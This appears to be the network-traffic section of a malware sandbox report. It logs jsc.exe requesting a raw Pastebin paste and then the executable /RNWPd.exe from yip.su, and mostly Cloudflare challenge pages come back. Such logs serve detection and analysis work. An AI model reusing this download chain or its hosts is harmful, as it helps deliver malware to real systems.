                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:08:40 UTC691INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 5a 69 59 45 52 78 44 34 36 6d 68 42 53 4c 54 66 7a 46 62 68 6d 44 42 53 77 55 50 4f 67 34 4b 48 6f 6f 2b 73 54 53 41 36 77 59 6b 6c 6e 76 43 4e 50 4c 47 2f 6e 76 62 41 4e 6e 45 69 55 33 59 31 36 58 47 4e 52 76 51 38 47 4d 72 4c 6a 30 37 2f 4d 6c 71 6b 68 76 57 53 66 4a 6a 48 56 35 43 2b 52 70 44 53 47 4c 30 50 4a 46 55 3d 24 65 36 70 38 30 76 6a 43 72 55 32 74 71 49 73 56 4e 59 42 63 4b 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: ZiYERxD46mhBSLTfzFbhmDBSwUPOg4KHoo+sTSA6wYklnvCNPLG/nvbANnEiU3Y16XGNRvQ8GMrLj07/MlqkhvWSfJjHV5C+RpDSGL0PJFU=$e6p80vjCrU2tqIsVNYBcKQ==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:08:40 UTC1369INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:08:40 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:08:40 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:08:40 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:08:40 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:08:40 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:08:40 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:08:40 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 37 33 39 32 38 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 62 65 65 31 62 66 64 30 66 34 32 27 2c 63 48 61 73 68 3a 20 27 62 66 62 30 30 30 36 64 38 66 66 36 35 61 65 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 70 48 77 30 6f 57 54 37 67 5a 57 51 41 6e 36 38 50 6a 76 4d 2e 71 52 55 4f 53 7a 43 6a 58 30 4a 66 50 46 76 5f 38 4d 47 4c 6d 34 2d 31 37 32 33 39 33 32 35 32 30 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '73928',cRay: '8b4cfbee1bfd0f42',cHash: 'bfb0006d8ff65ae',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=pHw0oWT7gZWQAn68PjvM.qRUOSzCjX0JfPFv_8MGLm4-1723932520-0.0.1.1-4137",cFPWv: 'g',cTTim
                                    2024-08-17 22:08:40 UTC1369INData Raw: 74 75 47 35 72 33 64 45 68 70 35 4b 32 72 78 4c 57 49 65 67 76 56 67 72 6b 4c 4d 35 61 59 46 61 53 64 59 54 65 41 4f 69 76 62 4c 5a 50 6e 38 33 44 75 31 75 34 4c 78 38 37 4d 62 31 6b 35 46 64 70 50 67 43 79 41 6b 36 4a 4b 4d 73 68 31 35 67 66 6b 45 44 77 6b 6b 4b 4f 46 59 47 75 70 6a 4c 44 53 70 46 30 34 52 58 79 31 76 4c 73 68 31 49 75 77 5a 38 39 4d 52 35 5a 44 78 36 62 75 44 44 37 64 5a 4d 4f 50 72 37 63 63 70 72 32 77 48 69 68 4a 7a 6b 75 70 7a 49 61 54 67 50 44 6c 49 4c 34 55 4a 52 49 75 43 6e 75 68 44 78 6e 30 59 43 30 38 67 48 6f 54 33 59 56 78 4c 41 6f 41 4e 63 64 55 77 58 2e 55 59 38 6b 6e 70 61 61 6f 64 4e 4d 39 55 53 66 78 61 4e 6f 52 73 77 41 61 6e 72 46 7a 46 64 57 62 6a 33 45 6f 51 35 77 6d 76 45 35 4a 41 56 44 30 75 56 46 44 69 69 45 47 75
                                    Data Ascii: tuG5r3dEhp5K2rxLWIegvVgrkLM5aYFaSdYTeAOivbLZPn83Du1u4Lx87Mb1k5FdpPgCyAk6JKMsh15gfkEDwkkKOFYGupjLDSpF04RXy1vLsh1IuwZ89MR5ZDx6buDD7dZMOPr7ccpr2wHihJzkupzIaTgPDlIL4UJRIuCnuhDxn0YC08gHoT3YVxLAoANcdUwX.UY8knpaaodNM9USfxaNoRswAanrFzFdWbj3EoQ5wmvE5JAVD0uVFDiiEGu


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    14192.168.2.549736104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:45 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:45 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:08:45 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfc0e680f72b9-EWR
                                    2024-08-17 22:08:45 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:08:45 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:08:45 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:08:45 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:08:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    15192.168.2.549737188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:47 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:47 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:08:47 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:08:47 UTC675INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 65 6e 4f 5a 67 4a 55 67 48 4e 2b 6e 44 66 68 5a 53 4b 41 52 4d 58 50 51 51 58 4a 65 66 71 54 2f 58 51 66 69 69 33 74 61 51 36 34 48 78 49 63 36 5a 57 64 6f 51 33 46 51 48 64 64 2f 4d 30 50 66 49 50 33 6a 48 6a 6d 79 74 6b 36 4e 52 48 37 6e 7a 73 38 6c 44 53 32 66 6d 4f 5a 5a 62 73 52 2b 4d 45 4a 2f 6c 6f 4b 5a 6d 4d 49 3d 24 39 77 72 5a 2b 5a 7a 49 61 77 62 6a 46 63 51 46 7a 57 72 68 53 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: enOZgJUgHN+nDfhZSKARMXPQQXJefqT/XQfii3taQ64HxIc6ZWdoQ3FQHdd/M0PfIP3jHjmytk6NRH7nzs8lDS2fmOZZbsR+MEJ/loKZmMI=$9wrZ+ZzIawbjFcQFzWrhSQ==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:08:47 UTC1369INData Raw: 33 65 31 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3e11<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
